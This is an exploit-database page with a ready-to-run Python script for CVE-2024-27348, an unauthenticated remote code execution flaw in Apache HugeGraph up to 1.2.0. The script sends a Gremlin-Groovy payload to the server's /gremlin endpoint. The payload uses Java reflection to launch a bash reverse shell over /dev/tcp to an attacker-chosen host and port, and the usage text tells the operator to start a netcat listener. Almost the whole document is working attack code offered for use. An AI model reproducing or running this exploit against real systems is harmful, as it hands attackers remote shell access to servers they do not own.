Exploit for Apache HugeGraph Server 1.2.0 Remote Code Execution CVE-2024-27348

## https://sploitus.com/exploit?id=PACKETSTORM:190369
Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
    # Exploit Author: Yesith Alvarez
    # Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
    # Version: Apache HugeGraph 1.0.0 - 1.2.0
    # CVE : CVE-2024–27348
    
    from requests import Request, Session
    import sys
    import json
    
    def title():
        print('''
        
       ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___  
      / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ ) 
     | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \ 
     | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
      \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/ 
    
    [+] Reverse shell                                                                                                                                                                                     
    Author: Yesith Alvarez
    Github: https://github.com/yealvarez
    Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
        ''')   
    
    
    def exploit(url, lhost, lport):       
        payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
        headers = {    
        'Content-Type': 'application/json'}
        s = Session()
        url = url + "/gremlin"
        req = Request('POST', url, json=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        print(prepped.headers)
        print(url)
        print(resp.headers)       
        print(payload)
        print(resp.status_code)
        print(resp.text)
    
    
    if __name__ == '__main__':
        title()
        if(len(sys.argv) < 4):
            print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
            print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))  
            print('[+] Do not forget to run the listener: nc -lvp 4444\n')      
            exit(0)
        else:
            exploit(sys.argv[1],sys.argv[2],sys.argv[3])